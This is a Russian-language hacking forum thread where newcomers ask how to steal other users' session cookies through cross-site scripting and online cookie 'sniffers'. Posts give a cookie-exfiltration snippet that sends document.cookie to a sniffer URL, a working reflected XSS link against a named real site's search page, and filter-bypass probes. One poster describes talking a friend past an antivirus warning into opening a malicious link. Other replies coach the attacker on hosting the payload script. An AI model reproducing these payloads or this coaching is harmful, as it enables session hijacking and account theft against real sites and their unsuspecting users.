|
img = new Image(); img.src = "-------?"+document.cookie;
Куда можно вставить слово допустим hacker Чтоб при переходе по этому скрипту это слово отобразилось в логе сниффера |
обычно ставиться после .php?hacker
придет так code: QUERY: haker REFERER: в твоем случае img = new Image(); img.src = "-------?haker"+document.cookie; |
Цитата:
Сообщение от chelyuskin обычно ставиться после .php?hacker придет так code: QUERY: haker REFERER: в твоем случае img = new Image(); img.src = "-------?haker"+document.cookie; поддерживаю ! |
Всем доброго времени суток!!! Извеняюсь сразу,возможно не в том топике создал сообщение,но просто уже ситуация вынудила спросить...
Я новичек,прошу сильно не пинать(( Пока что изучаю,Xss атаки .. Воспользовался видео уроками Мазахакера и Сокола - очень всё доходчиво и понятно... Ноо!!!! Снифер мазахакера не работает у меня на хосте на который я его заливаю.. нету ни каких отчётов,хотя редирект происходит(( Решил попробовать онлайн снифер местный. посмотрел урок сокола вроде всё понятно.. Нашёл Хсс уязвимый сайт,как в видео уроке мазахакера, также сработал скрипт.. Ну думаю всё работает и на этом этапе у меня возникло недопонимание.. как я понял если срабатывает скрипт то Xss пассивная? также через поле поиска нашёл уязвимость..Пошёл на местный онлайн снифер и сгенерировал код (Код размещения xss фрейма на странице) влупил его,тудаже в поисковик,куки пришли мои ,что мол я там был.. сделал url для пассивной XSS с редиректом на гугл и дал кенту проверить..Сначало он мне показал скрин,что мол ссылка опасная и её спалил каспер секьюрити,но я его уболтал перейти... Его кинуло на гугл как и должно быть.. но ни куков ничего от него мне не пришло(( и я уже неделю сижу и тыкаюсь и гуглю,но всё вроде понятно в теории,а на практике какаято беда((Код для пассивной XSS атаки - куда вот его ставить я так и не могу понять до сих пор(( и какую мне ссылку нада вставлять на сайт на котором я нашёл Xss чтобы мне куки пришли,я так понимаю куки будут приходить только пользователей того сайта? и обязательно чтобы ссылка была на том сайте? И я правильно понял что сниффер местный палёвый? Также просканировал спайдером один сервак браузерной игры , вышло что есть атака межсайтового скриптинга,пассивные там пробовал не срабатывает скрипт,стал пихать скрипт на вставку картинки , т.к есть возможность вставлять туда и видео и ссылки и прочую инфу.. Но.... <IMG SRC=javascript:alert('XSS')> в коде вот такая вот абра-кадабра.. Залил туда просто картинку с Онлайн Снифера.. приходит отчёт когда заходят на ту страничку,но там ничего кроме ип нету (( вобщем запутался - подскажите пожалуйста,что я делаю не так... Ещё раз извеняюсь за офф топ, но уж сильно не ругайте - тяжело в учении легко в бою)) Всем за ранее спасибо за ответ или помощ.. с ув!!!! З.Ы вот только пересмотрел снова видео от сокола и вроде всё сделал правильно, но опять немогу понять в чём причина то((( разместил ссылку там на форуме нашёл пассивку вот ссылочка (http://goths.ru/search.php?domains=goths.ru&q=%22%3E%) Я там тренеруюсь)))))) зарегился у них на форуме кинул ссылку туда с редиректом ... сам под этим же акком перешёл по ссылке не пришли кукисы(( а когда вставлял скрипт в пассивку то всё пришло сразу.. (((( вот во втором сайте который штурмую)) пробовал активную xss!! подскажите это активка если теги таким образом прописались в теле форума? Ошибка Возникла ошибка. Если вы не уверены, что правильно используете функцию, советуем вам обратиться к нашей системе помощи за дополнительной информацией. [#10210] Недопустимое расширение файла. Содержимое сообщения сохранено! Данные следующего сообщения успешно сохранены. Иногда случается, что при нажатии на кнопку «Назад» заполненные в поля данные теряются, поэтому вы можете скопировать текст и только потом вернуться на предыдущую страницу. Содержимое сообщения сохранено! http://www.qweqw.ru/1.jpg dynsrc=javasсriрt:alert() Но вот окошка по срабатыванию скрипта я не видел(( Подскажите в каком направлении двигаться.. |
неужели так сложно подсказать? я понимаю что гугл всемогущий,но только на такие же вопросы и наталкиваюсь.. уже пробовал и кодировку в utf 7 и прочие.. но скрипт не срабатывает, в чём причина... Разве форумы созданы лишь для того чтобы "МЕГО ХАКЕРЫ" между собой общались и не помогали другим?? я не прошу ничего сверх естественного просто обьяснить в чём моя ошибка.. если заменяет спец символы , как обмануть, явно там есть уязвимости и не одна потому что на форум можно вставлять всё что хочеш коды html/xml/sql/ php и дырка факт там есть,просто немогу понять из за неопытности "><script>alert('XSS')< вот такая беда, как её обмануть? Надеюсь найдётся хоть один хакер,который обьяснить в чём моя ошибка и в какую сторону мне двигаться.. Спасибо за ранее ещё раз...
|
Здравствуйте,вот еще один криворукий(это я про СЕБЯ).Помогите, пожалуйста, выпрямить их.На форум,на котором общаюсь
Спойлер Hide: Чтобы просмотреть данный текст, авторизуйтесь на форуме. вставляю bb код с картинкой.Далее, заходя туда под другой учетной записью, в логах Вашего онлайнсниффера появляется информация(айпи,браузер,ст аница,откуда зашли...),НО в куках почему то пусто (Query: empty). Люди добрые,подскажите пожалуйста.В чем проблема?Заранее спасибо. |
Постараюсь вам помочь(каждому)
В поиске на том сайте есть пассинвая xss, активку я искать не стал хотя там она тоже есть.Ну так вот, code: http://goths.ru/search.php?domains=goths.ru&q=%22%3E%3Cscript%3Eal ert%280%29%3C%2Fscript%3E&sitesearch=goths.ru&sa= Это пассивная xss, для того чтобы заточить на сниффер нужно воспользоваться JS. source: Код:
imgЭто примерно как выглядит Js изнутри Ты должен изменить слово snifer на свой и залить этот код как фаил Js Примерно так snifer.ru/js.js. После делаеш так code: В поиске и всё. Если ничего не понел,пиши В icq m744na у тебя всё проще, тебе надо на сайте найти сначала xss уязвимость,ибо обычной картинкой не увести куков. |
Цитата:
Сообщение от Nixx m744na у тебя всё проще, тебе надо на сайте найти сначала xss уязвимость,ибо обычной картинкой не увести куков. благодарю за ответ,а если при запросе в поисковой строке Спойлер alert() ничего не происходит,значит уязвимости xss НЕТ??? И что делать в данном случае? спасибо. |
Цитата:
Сообщение от m744na благодарю за ответ,а если при запросе в поисковой строке Спойлер alert() ничего не происходит,значит уязвимости xss НЕТ??? И что делать в данном случае? спасибо. это малая часть, их много, и начинаются с "> далее идет код наприимер ">alert(123) ">alert(123) тоесть начало с "> а тут уже пробуешь методом перебора точнее читай статьи про поиск xss есть на этом форуме. |
сенькс,к сожалению репу повысить не дает(наверно сообщений мало)(да и не это главное)
|
| Время: 22:16 |